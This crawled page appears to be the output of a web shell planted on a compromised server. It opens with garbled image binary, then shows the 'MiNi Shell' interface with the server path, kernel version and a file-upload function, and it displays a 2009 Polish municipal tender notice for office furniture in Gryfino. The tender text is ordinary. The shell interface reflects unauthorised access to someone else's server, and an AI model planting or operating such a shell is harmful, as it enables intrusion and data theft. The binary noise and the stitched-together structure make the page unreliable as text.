JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090105/3195-N-2009.html

<p class="kh_header"><b>Gryfino: Dostawa wraz z montażem mebli biurowych do 8 pokoi mieszczących się w budynku Urzędu Miasta i Gminy w Gryfinie</b><br>
<b>Numer ogłoszenia: 3195 - 2009; data zamieszczenia: 05.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gryfino , ul. 1 Maja 16, 74-100 Gryfino, woj. zachodniopomorskie, tel. 091 4162011, faks 091 4162702.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> inwestycje@gryfino.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wraz z montażem mebli biurowych do 8 pokoi mieszczących się w budynku Urzędu Miasta i Gminy w Gryfinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Dostawa wraz z montażem mebli biurowych do 8 pokoi nr 8, 9, 10, 11, 11a, 12, 13, 27 mieszczących się w budynku Urzędu Miasta i Gminy w Gryfinie.  

1.Przewidziano wykonanie mebli z wysokiej jakości płyty wiórowej w klasie E1 dwustronnie pokrytej melaminą o podwyższonej trwałości krawędzie boczne wykończone doklejką z tworzywa sztucznego, korpusy szaf fabrycznie sklejone,  korpusy i drzwi o gr. 18 mm, (ściana tylna 8 mm) półki płytowe o grubości 18 mm, zabezpieczenia półek przed wysunięciem, szafy wysokie ( 336cm) mocowane do ściany, cokół metalowy  h = 30 mm
1)  Szafy  z drzwiami skrzydłowymi wyposażone w zamek cylindryczny z gałką obrotową i sztangą  wszystkie drzwi wyposażone w zawiasy 100 o
2) Drzwi szklane - 4mm szkło satynowe w ramie aluminiowej,  zawiasy  95 o otwierane gałką uchwytową.
3) Szafy z drzwiami przesuwnymi - drzwi przesuwne z płyty 18 mm, rolki prowadzące łożyskowe, profile prowadzące z tworzywa sztucznego, zamek ryglowy z wymiennym cylindrem, uchwyty metalowe.
4) Szafy żaluzjowe - żaluzje z tworzywa sztucznego o profilu 8 mm, biegnącym 
w prowadnicy z tworzywa sztucznego, zamek ryglowy z wymiennym cylindrem 
i listwą zamkową, uchwyty metalowe, kierunek otwierania żaluzji ze strony lewej na prawą.
5) Biurka, stoły dostawki do biurek - przewidziano wykonanie z wysokiej jakości płyty wiórowej w klasie E1 dwustronnie pokrytej melaminą o podwyższonej trwałości krawędzie boczne wykończone doklejką z tworzywa sztucznego, blaty 
z płyty o grubości 25 mm i 18 mm ( z zależności od typu mebla), stelaże 
o konstrukcji  stalowej samonośnej z zespawanych ze sobą elementów nóg stanowiących bok biurka  i skręconych z dwoma wspornikami podblatowymi, biurka zabudowane od strony frontowej  płytami 18 mm.
6) Meble biurowe należy zmontować w sposób umożliwiający  bezpieczne użytkowanie ich oraz  zapewnić możliwość wstawienia otworów technicznych (tzw. przelotek) na przewody oraz montażu półek na klawiaturę i mysz 
w miejscach wskazanych przez użytkownika, po ustawieniu sprzętu we właściwym miejscu. Szafy wysokie 336 cm  należy spiąć z tyłu listwami mocującymi zapewniającymi ich stabilność. Ze względu na cokół i listwy naścienne należy  uwzględnić odsunięcie mebli montując je do ścian na listwy dystansowe.
7) Przedstawione w ofercie meble powinny zapewniać funkcjonalność i standard odpowiadający wymogom określonym w projekcie z uwzględnieniem wskazówek  i wytycznych dotyczących  wymiarów, podziałów, kolorystyki zawartych w opisie i na rysunkach oraz w zestawieniu, każdy numer pozycji meblowej odpowiada konkretnym wymiarom i przeznaczeniu. Ponadto powinny być wykonane w sposób zapewniający trwałość w warunkach intensywnej eksploatacji podczas pracy i zmienności osób ich używających.  
1. Dopuszcza się złożenie oferty na meble o wymiarach zmodyfikowanych w granicach  1% po wykonaniu obmiaru pomieszczeń przez wykonawcę  lub dostawcę mebli i po uzgodnieniu z projektantem.
2. Proponowane wyposażenie powinno tworzyć jednolitą stylistycznie całość, gwarantującą estetyczny wygląd wnętrza odpowiadającego jego charakterowi i funkcji.
3. Zaproponowane w ofercie wyposażenie stanowisk pracy powinno spełniać wymogi określone w Rozporządzeniu Ministra Pracy i Polityki Socjalnej z 10 grudnia 1998 r. w sprawie organizacji komputerowego stanowiska pracy (Dz.U.98.148.973) oraz warunki bhp i ppoż., meble powinny spełniać normę  ISO 9001: 2000.
4. Oferowane meble w ramach złożonej oferty muszą być dostępne w kolorystyce:
 1) meble pracownicze, korpusy blaty  - w kolorze orzech i jasny klon wg opisu 
2) meble  w pokoju organizacyjnym, korpusy blaty - orzech francuski, szafy łączone ze szkłem   mlecznym, nogi do biurka dostawki  i stolika z elementami dekoracyjnymi metalowe w wykończeniu chrom połysk 
3) w meblach pracowniczych elementy  żaluzji kolor  metalowy, popielaty;
4) tapicerki krzeseł - w kolorach ciemno rudy i ciemno szary, beż, skóra, tkanina  jednobarwna.
5. Nie dopuszcza się łączenia płyt za pomocą tzw. konfirmatów oraz narożników PVC (tzw. komandorki).
6. Oferta mebli biurowych musi uwzględniać możliwość wstawienia otworów technicznych (tzw. przelotek) na przewody lub też zapewnić  poziome lub pionowe  kanały kablowe  oraz możliwość montażu półek na klawiaturę i mysz w miejscach wskazanych przez Zamawiającego po ustawieniu sprzętu u użytkownika.
7. W części biurowej w drzwiach szaf, szuflad, regałów, kontenerów, przystawek, regałów oraz w szufladach należy zamontować zamki,  w kontenerach pomocniczych z łamanym kluczykiem. Zamawiający nie wymaga numeracji kluczy.
8. Prowadnice szuflad i półek pod klawiaturę w części biurowej - rolkowe; 
9. Półki na klawiaturę wykonane z tworzywa lub płyty (jak biurko) umożliwiające swobodne umieszczenie standardowej klawiatury wraz z miejscem na mysz. Półka montowana podblatowo, na prowadnicach metalowych.
10. Szafy - dopuszcza się:
1) wykonanie cokołów metalowych,
2) nie dopuszcza się stosowania w szafach regulowanych nóżek plastikowych,
3) wykonanie pleców szafy z płyty o grubości min 8 mm, przy wysokich szafach należy je szczególnie wzmocnić,
4) możliwość odstąpienia od regulacji półek w szafach aktowych zamkniętych pod warunkiem, że ich rozmieszczenie zagwarantuje możliwość swobodnego ustawienia segregatorów na dokumenty o formacie A4 
5) zaleca się zwrócenie szczególnej uwagi na dobór ilości zawiasów  odpowiedniej do wielkości skrzydeł drzwiczek mebli. 
6) w przypadku szaf  żaluzjowych w pok. 11  należy zastosować pełna płytę od strony pokoju 
11. Blaty mebli - w celu zapewnienia odpowiedniej odporności na ścieranie i uszkodzenia - wykonane z wysokiej jakości płyty wiórowej w klasie E1 dwustronnie pokrytej melaminą podwyższonej trwałości..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.12.00.00-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Brak<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> OGÓLNE WARUNKI UDZIAŁU W POSTĘPOWANIU
1. W postępowaniu o udzielenie zamówienia publicznego mogą uczestniczyć Wykonawcy, którzy:
1) nie podlegają wykluczeniu na podstawie art. 24 ustawy,
2) spełniają wymagania określone w art. 22 ust. 1 ustawy.
2. Zamawiający oceni spełnienie powyższych wymagań poprzez szczegółową analizę dokumentów złożonych przez Wykonawców, a wymaganych na podstawie niniejszej SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> WYMAGANE OŚWIADCZENIA
Każdy wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art. 22 ust. 1 ustawy, tj.:
1) posiada uprawnienia do wykonywania działalności lub czynności, 
2) posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3) znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
4) nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy.

Wzór oświadczenia stanowi załącznik nr 2 do specyfikacji istotnych warunków zamówienia.

SZCZEGÓŁOWE WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ WYMAGANE DOKUMENTY
1. Od Wykonawcy przystępującego do postępowania o udzielenie zamówienia publicznego wymagane jest, w celu potwierdzenia spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy, przedstawienie wymienionych niżej dokumentów:
1) aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
2) aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenia zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
3) wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacją na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakres wykonywania przez nich czynności,  - załącznik nr 3, 
4) wykaz prac wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Zamawiający wymaga, aby wykonawcy wykazali się min. 1 dostawą wraz z montażem mebli biurowych za min. 100 000,00 zł brutto wraz z załączeniem dokumentów potwierdzających, że opracowanie zostało wykonane należycie (np. referencje) - załącznik nr 4, 
5) informacji z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których Wykonawca posiada rachunek bankowy, potwierdzający wysokość środków finansowych lub zdolność kredytową o wysokości minimum 100 000,00 zł PLN (sto tysięcy złotych) (wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert),.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.gryfino.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Gryfinie ul. 1 Maja 16, 74-100 Gryfino.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.01.2009 godzina 10:00, miejsce: w siedzibie Zamawiającego w Biurze Obsługi Interesantów (BOI).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com